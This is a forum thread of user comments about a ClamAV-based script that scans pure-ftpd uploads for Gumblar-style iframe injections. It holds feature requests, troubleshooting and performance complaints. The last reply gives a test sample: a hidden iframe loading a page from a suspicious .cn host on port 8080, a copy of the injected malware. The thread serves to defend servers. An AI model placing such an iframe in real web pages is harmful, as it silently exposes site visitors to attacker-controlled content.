SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...

This script seems very insteresting and useful, for some reason it does not work in my server ... I will keep trying to get it to work..

 

Hi great work !!
I honestly appreciate what you have made for the community.

I would like to request 2 things to enhance the features:

1. I have two servers and get the alerts on the same email address for both the servers. Can you add the server hostname in the email subject? like:

Gumblar Attack !!! user : trafficn on [HostNameHere]

2. when the files are quarnteened, its a very logical and good idea to move the files to directories with the username.
I;d request you add the username dir so the file is moved to the relevent user folder. like:

/quarantine/clamav/UserNameHere/infectedfile.ext


Thanks and hope these can be implemented in the next update.

 

when sould i be back to check the update?

 

Hello,

First, congrats for your great script. I think we all could donate something to to support this great work.

Any idea on the hostname option in subject? I have a few servers, and this option would be very important.

thanks

 

Hi,
Firstly I also want to thank you for your time on this.

I haven't tried it yet, but can you let us know how it compares to the CSX offering from Configserver.com please?

Would it also be pointless to have both?

Best regards,

- Vince

 

I have installed by following Installation » Anti-Gumblar
I have tried to upload IFrame infacted file.
But I think this scripts is not working for me.
I have restarted pure-ftp many times via /etc/init.d/pure-ftpd restart
But Still not working

 

I have follow the error log file in same folder and found some comments in ftp_clamscan_config.php file was not in one line, so second line was not commented.
Due to this The script was showing error.
I comment out second line now the script is working fine.
Thanks for a great script.

 

Very Nice script but using too much CPU at the time of scanning.
My server load increases 2 times one someone upload file via ftp.

 

Instead of quarantine, the script should simply remove the iframe code which has been injected and block the IP from which the injection was done. This would make more sense.

 

Sorry to open an old thread, but I've sucessfully installed this on 5 servers, but I have to servers that it just doesn't want to work on.

On those servers, the install appears to go ok, and the restart of pure-ftpd through ssh seems to work fine. I see this from my ps output:

root 7935 0.0 0.0 7616 260 ? Ss 15:21 0:00 /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.php
root 8268 0.0 6.4 156940 133632 ? Ssl 16:54 0:00 /usr/local/sbin/clamd


But when I upload a file nothing happens. No quarantine, no log in the log file, no e-mail?

is there a checklist of things I should try maybe?

 

How to test it?

How can I test it? I've installed it but how can I make sure it works.? I uploaded a .php file with the following lines:

iframe
http://
:8080

 

Create a file with this in it:

Code:

<iframe src="http://gianthighest.cn:8080/index.php" width=171 height=190 style="visibility: hidden"></iframe>